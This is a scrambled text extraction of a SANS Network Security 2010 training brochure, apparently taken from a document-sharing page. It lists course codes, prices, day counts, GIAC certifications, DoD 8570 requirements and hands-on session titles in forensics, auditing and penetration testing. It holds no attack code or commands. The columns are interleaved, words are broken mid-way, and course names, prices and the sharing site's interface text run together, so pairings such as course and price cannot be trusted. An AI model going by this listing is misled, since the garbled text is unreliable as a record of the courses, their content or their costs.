DEV534 MGT404: Fundamentals of Information Security Policy PG 16 SEC504 504.1 Six Full Days . . . . . . . . . . . . . . . . . . . . . . . . . . . $4,350 $4,350 $4,350
AUD521: Meeting the Minimum: PCI/DSS 1.2:
Secure Code Review Becoming and Staying Compliant PG 12 SEC505 505.1 505.2 505.3 505.4 505.5 505.6 Seven Full Days . . . . . . . . . . . . . . . . . . . . . . . . $4,950 $4,950 $4,950
for Java Web Apps GIAC certification MGT421: SANS Leadership and Management Competencies PG 16 Eight Full Days . . . . . . . . . . . . . . . . . . . . . . . . . $5,550 $5,550 $5,550
SEC506 506.1 506.2 506.3 506.4 506.5 506.6
Additional Secure Coding Courses SEC440: 20 Critical Security Controls: available for courses MGT432: Information Security for Business Executives
Planning, Implementing, and Auditing indicated with
DEV304: Software Security Awareness MGT438: How to Establish a Security Awareness Program R E M I N D E R :
SEC566: Implementing & Auditing the Twenty Critical GIAC acronyms
DEV536: Secure Coding for PCI Compliance Security Controls - In-Depth PG 20 MGT570: Social Engineering Defense PG 16 When you register, please use the promo code located on the back cover.
Las Vegas
PRSRT STD
Suite 205
U.S. POSTAGE
Bethesda, MD 20814
SANS
2010
-JASON FOWLER, UBC
ance
n Se
co
Network Secu
-2010
was wasted”

SANS Network Security 2010 - Brochure

Uploaded by

Document Information

Original Description:

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

SANS Network Security 2010 - Brochure

Uploaded by

Copyright:

Available Formats

Las Vegas

8120 Woodmont Avenue

For detailed descriptions of all SANS courses, visit: www.sans.org

The Only Hands-on

CAREER SANS COURSE CERT CAREER SANS COURSE CERT

Security Analyst SANS Security Essentials Penetration Network Penetration

Computer Computer Forensic

Intrusion Analyst Intrusion Detection Information SANS Security Leadership

Incident Handler Hacker Techniques, Exploits, Information Auditing Networks,

6 SANS Network Security 2010

DoD Directive 8570 requires:

DoD Baseline IA Certifications SANS Training for

IASAE I IASAE II IASAE III SEC504 . . . . . . . . . . . . GCIH

CND INFRASTRUCTURE SUPPORT CN-SP MANAGER

8 SANS Network Security 2010

If you hold a current GIAC Gold certification

Prerequisites How to Apply How to Take Courses

10 SANS Network Security 2010

The Master of Science Degree in The Master of Science Degree in

Admission SEC401 Admission MGT512

Legal Issues and PCI Legal Issues in Information Technology LEGAL

and Information Security 523

Security Summit 2010 New laws regarding privacy, e-discovery, and

About the Program

Join as a Team or an Individual

14 • Contact us at onsite@sans.org to create a training schedule

MANAGEMENT SKILL-BASED SHORT COURSE

MGT305: Technical Communication and Presentation Skills

MGT421: SANS Leadership and Management Competencies

MGT570: Social Engineering Defense

16 SANS Network Security 2010

SECURITY SKILL-BASED SHORT COURSES

SEC565: Data Leakage Prevention – In Depth

SEC550: Information Reconnaissance:

SEC556: Comprehensive Packet Analysis

SEC567: Power Packet Crafting with Scapy

18 SANS Network Security 2010

Key Techniques System Administrators Use to Find Hackers In Their Systems

SEC577: Virtualization Security Fundamentals

NEW Two-DaySEC580: Metasploit Kung Fu for Enterprise Pen Testing

20 SANS Network Security 2010

522.2 Hands On: Web Application Common Vulnerabilities

507.1 Audit Principles, Risk Assessment,

507.2 Hands On: Auditing the Perimeter

408.1 Hands On: Forensic and E-Discovery Fundamentals*

508.1 Hands On: Forensic and Investigative Essentials*

508.2 Hands On: Live Response and Complex Evidence Acquisition*

558.1 Hands On: Passive Evidence Acquisition and Analysis*

563.1 Hands On: Fundamentals of Mobile Device Forensics*

563.2 Hands On: Windows Mobile Forensics*

563.3 Hands On: Cell Phone Forensics*

563.4 Hands On: Blackberry, Nokia, and iPhone*

563.5 Hands On: Advanced Forensics and the Forensic Challenge*

34 SANS Network Security 2010 GIAC Certification

610.2 Hands On: Additional Malware Analysis Approaches*

36 SANS Network Security 2010

Hands On – Part 2: Drive and Data Recovery Forensics*

Hosted Instructor Hands On – Part 3: Drive and Data Recovery Forensics*

drive, successfully recovering

in courts around the world.

414.1 Introduction and Information Security Governance &

414.2 Access Controls and Cryptography*

Essential topics covered in this management course include network